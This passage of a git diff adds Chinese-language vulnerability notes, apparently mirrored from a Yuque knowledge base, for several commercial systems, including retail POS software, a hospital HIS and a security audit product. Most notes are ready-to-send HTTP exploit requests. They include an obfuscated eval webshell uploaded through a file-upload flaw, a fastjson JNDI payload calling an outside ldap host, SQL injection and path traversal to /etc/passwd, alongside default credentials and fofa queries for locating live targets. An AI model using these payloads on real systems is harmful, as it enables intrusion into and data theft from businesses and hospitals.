+{"Body":{"pos_id":"test","file_data":"UEsDBBQAAAAIAJmoeFdm5m19YgAAAGQAAAATAAAAaW5pdC1jNTIyMjg1MzVhLmNzcwXBQQqEMAwAwLvgH3rcPXRJaV3Qk19JkxQLGsUqKuLfnekn4Yym0CqiBpXNZ8LTHpm3oXM+wHJ+77r6qRzF0rzrZpOTBjhBixJT5Cb9OXhHPgZwBBRvzmUZ8ep0Vnnq6nkBUEsBAj8AFAAAAAgAmah4V2bmbX1iAAAAZAAAABMAJAAAAAAAAAAgAAAAAAAAAGluaXQtYzUyMjI4NTM1YS5jc3MKACAAAAAAAAEAGADoFpjO1h7aAQAAAAAAAAAAAAAAAAAAAABQSwUGAAAAAAEAAQBlAAAAkwAAAAAA","last_time":""}}
+```
+
+![1705135268669-5e7dd30a-96c0-45eb-9c07-43b82a233582.png](./img/EYVidbNdF5vXvYpz/1705135268669-5e7dd30a-96c0-45eb-9c07-43b82a233582-331085.png)
+
+上传文件位置
+
+```plain
+/AiItemImage/init-c52228535a.css
+```
+
+![1705135301442-a37e9e9c-c521-4b9b-b377-5d5f98f30f34.png](./img/EYVidbNdF5vXvYpz/1705135301442-a37e9e9c-c521-4b9b-b377-5d5f98f30f34-187161.png)
+
+漏洞利用
+
+准备webshell`stc.aspx`
+
+```plain
+<% function E873yr9k(){var GEPH="unsa",YACK="fe",C910=GEPH+YACK;return C910;}var PAY:String=Request["x"];~eval/*Zf10I0IzZH*/(PAY,E873yr9k());%><%@Page Language=JS%>
+```
+
+压缩webshell
+
+[stc.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/1622799/1709222142219-d3f253b2-3b28-4613-acfc-43fc8ef73eba.zip)
+
+将压缩文件转换为base64编码
+
+[Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222142539-f522d0ae-c3bc-443d-95b0-e63662e6b81b.jar)
+
+![1705135429824-9f80641f-7249-46cd-b415-a3874272492c.png](./img/EYVidbNdF5vXvYpz/1705135429824-9f80641f-7249-46cd-b415-a3874272492c-032939.png)
+
+上传webshell
+
+```plain
+POST /api/POS/SetAiPosItemImage HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Content-Length: 444
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/json
+Upgrade-Insecure-Requests: 1
+x-forwarded-for: 127.0.0.1
+
+{"Body":{"pos_id":"test","file_data":"UEsDBBQAAAgIABeAKli/64yUkwAAAKQAAAAIABAAc3RjLmFzcHhVWAwAEkeiZa5OnmX1ARQAs1FVSCvNSy7JzM9TcLUwN64ssszW0KwuSyxScHcN8LBVKs0rTlTSiXR09rZVSktV0nG2NDSwBUlpg8Ssi1JLSovyFECi1rUgXQGOkVbBJUWZeem2QamFpanFJdFKFUqx1nWpZYk5+lpRaYYGngaeVVEeWvoaQLU6CEs1rVXtbFQdAhLTUxV8EvPSS4EMW69gVTsAUEsBAhQDFAAACAgAF4AqWL/rjJSTAAAApAAAAAgADAAAAAAAAAAgAKSBAAAAAHN0Yy5hc3B4VVgIABJHomWuTp5lUEsFBgAAAAABAAEAQgAAAMkAAAAAAA==","last_time":""}}
+```
+
+![1705135455265-09705950-bc64-49f0-a43c-9771ade4110f.png](./img/EYVidbNdF5vXvYpz/1705135455265-09705950-bc64-49f0-a43c-9771ade4110f-087471.png)
+
+上传文件位置
+
+```plain
+/AiItemImage/stc.aspx
+```
+
+![1705135492983-2de64683-d6e8-42cb-b251-38c7c38eed5b.png](./img/EYVidbNdF5vXvYpz/1705135492983-2de64683-d6e8-42cb-b251-38c7c38eed5b-212372.png)
+
+[思迅商旗-setaipositemimage-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222142739-e95ae867-5ce0-482d-8b4e-707627bcdbe4.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fbpfgs6seeig8wdu>
\ No newline at end of file
diff --git a/思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md b/思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md
new file mode 100644
index 0000000..3314def
--- /dev/null
+++ b/思迅商旗商业管理系统7Cashier存在信息泄露漏洞.md
@@ -0,0 +1,37 @@
+# 思迅商旗商业管理系统7 Cashier存在信息泄露漏洞
+
+# 一、漏洞简介
+思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成，打造全新互联网产品。思迅商旗商业管理系统Cashier存在信息泄露漏洞。
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 思迅商旗商业管理系统7
+
+# 三、资产测绘
++ hunter`app.name=="思迅商旗"`
++ 特征
+
+![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/50UcaSwGuz9_KosN/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-954273.png)
+
+# 四、漏洞复现
+```java
+POST /api/Cashier/LoadData HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Length: 68
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+loadAll=false&cashier_id=&gridFlag=CashierList&page=1&rows=60
+```
+
+![1705060351817-349ac876-e506-4b44-b896-a17b0dcefa03.png](./img/50UcaSwGuz9_KosN/1705060351817-349ac876-e506-4b44-b896-a17b0dcefa03-502881.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgmcmt41ci8fdtuz>
\ No newline at end of file
diff --git a/思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md b/思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md
new file mode 100644
index 0000000..0213259
--- /dev/null
+++ b/思迅商旗商业管理系统7GylOperator存在信息泄露漏洞.md
@@ -0,0 +1,43 @@
+# 思迅商旗商业管理系统7 GylOperator存在信息泄露漏洞
+
+# 一、漏洞简介
+思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成，打造全新互联网产品。思迅商旗商业管理系统GylOperator存在信息泄露漏洞，<font style="color:rgba(0, 0, 0, 0.9);">攻击者可通过该漏洞在服务器端读取账户密码，从而登录后台。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 思迅商旗商业管理系统7
+
+# 三、资产测绘
++ hunter`app.name=="思迅商旗"`
++ 特征
+
+![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/2A930e-fCUruS1PS/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-600717.png)
+
+# 四、漏洞复现
+```java
+POST /api/GylOperator/LoadData HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Length: 68
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+loadAll=false&key=&oper_role=&gridFlag=GylOperatorList&page=1&rows=1
+```
+
+![1705060098747-c6665464-15ab-4c81-820d-1451d49f124f.png](./img/2A930e-fCUruS1PS/1705060098747-c6665464-15ab-4c81-820d-1451d49f124f-449203.png)
+
+解密
+
+![1705060110267-c8a83e28-b7a6-405a-a6ec-9d97db539e71.png](./img/2A930e-fCUruS1PS/1705060110267-c8a83e28-b7a6-405a-a6ec-9d97db539e71-014155.png)
+
+![1705060626680-642f8fe6-d094-4c99-af4a-978993b73ddb.png](./img/2A930e-fCUruS1PS/1705060626680-642f8fe6-d094-4c99-af4a-978993b73ddb-306254.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vzyrz9h4ztl1gdca>
\ No newline at end of file
diff --git a/思迅商旗商业管理系统7Operator存在信息泄露漏洞.md b/思迅商旗商业管理系统7Operator存在信息泄露漏洞.md
new file mode 100644
index 0000000..1e757ab
--- /dev/null
+++ b/思迅商旗商业管理系统7Operator存在信息泄露漏洞.md
@@ -0,0 +1,37 @@
+# 思迅商旗商业管理系统7 Operator存在信息泄露漏洞
+
+# 一、漏洞简介
+思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成，打造全新互联网产品。思迅商旗商业管理系统Operator存在信息泄露漏洞。
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 思迅商旗商业管理系统7
+
+# 三、资产测绘
++ hunter`app.name=="思迅商旗"`
++ 特征
+
+![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/4u1P83hisIgQdJ6S/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-962899.png)
+
+# 四、漏洞复现
+```java
+POST /api/Operator/LoadData HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Length: 68
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+loadAll=false&oper_role=&field=&operator=&value=1001&gridFlag=OperatorList&page=1&rows=10
+```
+
+![1705060505001-32bb86d5-04df-4001-888a-4880bd5e7c92.png](./img/4u1P83hisIgQdJ6S/1705060505001-32bb86d5-04df-4001-888a-4880bd5e7c92-968676.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/afl5poxqgwpz8yhp>
\ No newline at end of file
diff --git a/思迅商旗商业管理系统7存在弱口令漏洞.md b/思迅商旗商业管理系统7存在弱口令漏洞.md
new file mode 100644
index 0000000..bc72fea
--- /dev/null
+++ b/思迅商旗商业管理系统7存在弱口令漏洞.md
@@ -0,0 +1,43 @@
+# 思迅商旗商业管理系统7 存在弱口令漏洞
+
+# 一、漏洞简介
+思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成，打造全新互联网产品。思迅商旗商业管理系统7 存在弱口令漏洞。
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 思迅商旗商业管理系统7
+
+# 三、资产测绘
++ hunter`app.name=="思迅商旗"`
++ 特征
+
+![1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4.png](./img/4pn1CRecNauCHbAK/1705060048606-5d05fc49-9ceb-4db7-84e0-7304c7456bf4-659934.png)
+
+# 四、漏洞复现
+```java
+1001/1001
+```
+
+```java
+POST /api/Login/Login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Length: 68
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Cache-Control: no-cache
+Connection: close
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+id=1001&password=1001&onlineQuery=true
+```
+
+![1705060724236-2371caa6-c4c6-4269-9a01-00f464020b31.png](./img/4pn1CRecNauCHbAK/1705060724236-2371caa6-c4c6-4269-9a01-00f464020b31-293689.png)
+
+![1705060732228-0093a93b-e495-499e-ae31-e917007f0742.png](./img/4pn1CRecNauCHbAK/1705060732228-0093a93b-e495-499e-ae31-e917007f0742-006952.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xmf6cin0839sge0f>
\ No newline at end of file
diff --git a/急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md b/急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md
new file mode 100644
index 0000000..f415082
--- /dev/null
+++ b/急诊综合管理平台ServicePage.aspx任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# 急诊综合管理平台ServicePage.aspx任意文件读取漏洞
+
+急诊综合管理平台 ServicePage.aspx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件。
+
+## fofa
+
+```javascript
+body="/emis_lib/js/ThreeExtras.js"
+```
+
+## poc
+
+```javascript
+GET /dcwriter/thirdpart/ServicePage.aspx?wasmres=./../web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20250103100646017](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031006091.png)
\ No newline at end of file
diff --git a/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md b/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md
new file mode 100644
index 0000000..9928f7b
--- /dev/null
+++ b/悟空CRM9.0存在fastjson远程代码执行漏洞(CVE-2024-23052).md
@@ -0,0 +1,34 @@
+# 悟空CRM9.0 存在fastjson远程代码执行漏洞(CVE-2024-23052)
+
+# 一、漏洞简介
+ WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 中的一个问题允许远程攻击者通过 fastjson 组件中的 parseObject() 函数执行任意代码。
+
+# 二、影响版本
++ 悟空CRM9.0
+
+# 三、资产测绘
+```plain
+"悟空CRM"
+```
+
+![1720674649866-ce76a346-2f99-47e7-bf25-50dd41bd0118.png](./img/BBNca4tVgBc5_XpL/1720674649866-ce76a346-2f99-47e7-bf25-50dd41bd0118-556380.png)
+
+# 四、漏洞复现
+```http
+POST /CrmCustomer/queryPageList HTTP/1.1
+Host: 
+Content-Length: 93
+Content-Type: application/json;charset=UTF-8
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+Connection: close
+
+{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://pnftrxqvct.dgrh3.cn"}"
+```
+
+![1720674585092-2dd381e8-7b61-4eb3-9f6d-cd5e079e36a3.png](./img/BBNca4tVgBc5_XpL/1720674585092-2dd381e8-7b61-4eb3-9f6d-cd5e079e36a3-200256.png)
+
+
+
+> 更新: 2024-08-12 17:16:00  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gm114v8t0b3st6u7>
\ No newline at end of file
diff --git a/悦库网盘aRegisAdmin存在SQL注入漏洞.md b/悦库网盘aRegisAdmin存在SQL注入漏洞.md
new file mode 100644
index 0000000..85f817d
--- /dev/null
+++ b/悦库网盘aRegisAdmin存在SQL注入漏洞.md
@@ -0,0 +1,52 @@
+# 悦库网盘aRegisAdmin存在SQL注入漏洞
+
+# 一、漏洞简介
+悦库网盘系统是一款功能强大的云存储平台，提供安全可靠的文件存储、共享和管理解决方案。该系统具有灵活的存储容量、文件同步、多终端访问等特性，支持跨平台的文件分享和团队协作。悦库网盘系统采用先进的加密技术确保数据安全，并提供了用户友好的界面和多样化的权限管理功能，满足个人用户、企业团队和教育机构的不同需求。悦库网盘aRegisAdmin存在SQL注入漏洞
+
+# 二、影响版本
++ 企慧通教育系统
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(51, 51, 51);">app=</font><font style="color:rgb(221, 17, 68);">"悦库-悦库网盘"</font>`
+
+![1718298354037-b753585e-1dcd-4e0b-8eec-1400ed166620.png](./img/WtGy-d6GGtrILpmK/1718298354037-b753585e-1dcd-4e0b-8eec-1400ed166620-817530.png)
+
+# 四、漏洞复现
+```java
+POST /user/login/.html HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+Cookie: windowWidth=1036; windowHeight=846; yid=4m6jbq6mrd5mui6ul2gr3s9fl4; lang=zh-cn; device=desktop; theme=default
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 154
+
+account=admin') AND (SELECT 4215 FROM (SELECT(SLEEP(5)))CFVi)-- WUij&password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918&clientId=5E9B11EB90214398ADA353DF7F014E9C&referer=&keepLogin=false
+```
+
+![1718298437044-3bce6637-6009-4b59-b1e6-66eb178f5df4.png](./img/WtGy-d6GGtrILpmK/1718298437044-3bce6637-6009-4b59-b1e6-66eb178f5df4-331145.png)
+
+```java
+POST /user/login/.html HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+Cookie: windowWidth=1036; windowHeight=846; yid=4m6jbq6mrd5mui6ul2gr3s9fl4; lang=zh-cn; device=desktop; theme=default
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 154
+
+account=admin&password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918&clientId=5E9B11EB90214398ADA353DF7F014E9C&referer=&keepLogin=false
+```
+
+![1718298399701-682e6608-1c88-42b2-8c9e-60bfd0a3b5a3.png](./img/WtGy-d6GGtrILpmK/1718298399701-682e6608-1c88-42b2-8c9e-60bfd0a3b5a3-686633.png)
+
+
+
+> 更新: 2024-06-17 09:34:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iqb1350wkn2bu5qd>
\ No newline at end of file
diff --git a/惠尔顿安全审计系统download任意文件读取漏洞.md b/惠尔顿安全审计系统download任意文件读取漏洞.md
new file mode 100644
index 0000000..a6a6c4b
--- /dev/null
+++ b/惠尔顿安全审计系统download任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# 惠尔顿安全审计系统download任意文件读取漏洞
+
+# 一、漏洞简介
+对于军民融合政策的诸多中小企业来讲，大部分人员主要时间都时在非涉密区工作，并需要用到网络， 所以上网时不小心泄密成了一个可能泄密的高概率事件。 惠尔顿 通过 三员化管理、实名认证上网、网页记录、 邮件审查、文件上传下载、即时通讯、防私接、统计报表 等八大方面确保上网不泄密。惠尔顿网络安全审计系统download接口处存在任意文件读取漏洞，恶意攻击者可能会利用此漏洞获取服务器敏感信息，从而造成信息泄露。
+
+# 二、影响版本
++ 惠尔顿安全审计系统
+
+# 三、资产测绘
++ fofa`app="惠尔顿-网络安全审计系统"`
++ 特征
+
+![1708966359810-2fd7ba60-d5c3-42c3-9dcd-43cffca13a4a.png](./img/Ed_k3Vej_OmbWTmK/1708966359810-2fd7ba60-d5c3-42c3-9dcd-43cffca13a4a-045633.png)
+
+# 四、漏洞复现
+```plain
+GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1708966387262-824b2693-8e0c-4b28-8490-9108265f6ba3.png](./img/Ed_k3Vej_OmbWTmK/1708966387262-824b2693-8e0c-4b28-8490-9108265f6ba3-592859.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbrwp07p75ysgyvt>
\ No newline at end of file
diff --git a/懒人网址导航系统search存在SQL注入漏洞.md b/懒人网址导航系统search存在SQL注入漏洞.md
new file mode 100644
index 0000000..fbb0945
--- /dev/null
+++ b/懒人网址导航系统search存在SQL注入漏洞.md
@@ -0,0 +1,29 @@
+# 懒人网址导航系统search存在SQL注入漏洞
+
+# 一、漏洞简介
+懒人网址导航系统是一种智能化的网址导航平台，旨在帮助用户快速找到所需的网址和资源。该系统提供了以下功能和特点：该系统提供了智能化的网址搜索和推荐功能，能够根据用户的搜索习惯和偏好推荐相关的网址和资源。同时，系统还提供了网址分类、网址收藏和网址分享等功能，方便用户管理和共享网址。懒人网址导航系统存在SQL search接口处存在注入漏洞，恶意攻击者可能会利用此漏洞修改数据库中的数据，例如添加、删除或修改记录，导致数据损坏或丢失。 
+
+# 二、影响版本
++ 懒人网址导航系统
+
+# 三、资产测绘
++ fofa`"./templates/antidote/css/style.css`
+
+![1716364321581-c970a718-1a58-4d66-a24d-bbd5fb071411.png](./img/rmkV4XQtbb9HiW41/1716364321581-c970a718-1a58-4d66-a24d-bbd5fb071411-052360.png)
+
+# 四、漏洞复现
+```plain
+GET /search.php?keyword=' UNION ALL SELECT CONCAT(IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bypass HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1716364584387-8647dcda-d556-49e4-ac66-a177fda54135.png](./img/rmkV4XQtbb9HiW41/1716364584387-8647dcda-d556-49e4-ac66-a177fda54135-837041.png)
+
+
+
+> 更新: 2024-05-23 13:30:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nugh9v1qorh6l3wt>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md
new file mode 100644
index 0000000..f45e844
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞.md
@@ -0,0 +1,67 @@
+# 成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司HIS系统getContractSource存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
+    - 成都信通网易医疗科技发展有限公司HIS系统（基于电子病历的医院信息化平台）
+
+# 三、特征
+![1700650007533-e9496b7e-969f-4370-b652-44a251239e7b.png](./img/6tHPnbfRiahtTPoM/1700650007533-e9496b7e-969f-4370-b652-44a251239e7b-380998.png)
+
+# 四、漏洞复现
+    1. 漏洞位置
+
+在下列`nzzManager`接口下的`getContractSource`参数
+
+```plain
+/xtHisService/services
+```
+
+![1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf.png](./img/6tHPnbfRiahtTPoM/1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf-935835.png)
+
+    2. 使用burp抓包，使用wsdl插件解析
+
+```plain
+/xtHisService/services/nzzManager?wsdl
+```
+
+[wsdler.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222128209-b940588a-42dd-4499-95bf-a6da305a86b9.jar)
+
+![1700650674347-50992ebb-210b-4f8e-b50a-640b554118ea.png](./img/6tHPnbfRiahtTPoM/1700650674347-50992ebb-210b-4f8e-b50a-640b554118ea-682866.png)
+
+    3. 数据包
+
+```plain
+POST /xtHisService/services/nzzManager HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=0A4C07C0C8A7CFF9A03AD7B586FFCBBE
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: xx.xx.xx.xx
+Content-Length: 322
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imp="http://imp.nzz.ws.manager.cdxt.com/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <imp:getContractSource>
+         <!--type: string-->
+         <arg0>gero et</arg0>
+      </imp:getContractSource>
+   </soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1700650212974-87278389-d1ea-42ba-a89b-bbff759a26ed.png](./img/6tHPnbfRiahtTPoM/1700650212974-87278389-d1ea-42ba-a89b-bbff759a26ed-659778.png)
+
+![1700650253954-e7f0aa6b-9253-468a-91c0-007f4e540ea6.png](./img/6tHPnbfRiahtTPoM/1700650253954-e7f0aa6b-9253-468a-91c0-007f4e540ea6-514866.png)
+
+
+
+> 更新: 2024-02-29 23:55:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ia05az6it1imevtb>
\ No newline at end of file
diff --git a/成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md b/成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md
new file mode 100644
index 0000000..65f3821
--- /dev/null
+++ b/成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md
@@ -0,0 +1,63 @@
+# 成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞
+
+# 一、漏洞简介
+成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园，在国内医疗软件行业中率先采用Java技术，融入国际国内标准，整体设计，持续研发，先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品，全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 成都信通网易医疗科技发展有限公司HIS系统（基于电子病历的医院信息化平台）
+
+# 三、特征
+![1700650007533-e9496b7e-969f-4370-b652-44a251239e7b.png](./img/KK9xFI075kSNF6Fs/1700650007533-e9496b7e-969f-4370-b652-44a251239e7b-375656.png)
+
+# 四、漏洞复现
+1. 漏洞位置
+
+在下列`nzzManager`接口下的`getContract`参数
+
+```plain
+/xtHisService/services
+```
+
+![1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf.png](./img/KK9xFI075kSNF6Fs/1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf-255827.png)
+
+2. 使用burp抓包，使用wsdl插件解析
+
+```plain
+/xtHisService/services/nzzManager?wsdl
+```
+
+[wsdler.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222128291-9f1e688c-83d7-4634-9a48-af60d6d18b6e.jar)![1700650603699-766cdcf1-430c-4376-a4a0-6ef8acf31042.png](./img/KK9xFI075kSNF6Fs/1700650603699-766cdcf1-430c-4376-a4a0-6ef8acf31042-159137.png)
+
+3. 数据包
+
+```plain
+POST /xtHisService/services/nzzManager HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=0A4C07C0C8A7CFF9A03AD7B586FFCBBE
+Upgrade-Insecure-Requests: 1
+SOAPAction: 
+Content-Type: text/xml;charset=UTF-8
+Host: xx.xx.xx.xx
+Content-Length: 314
+
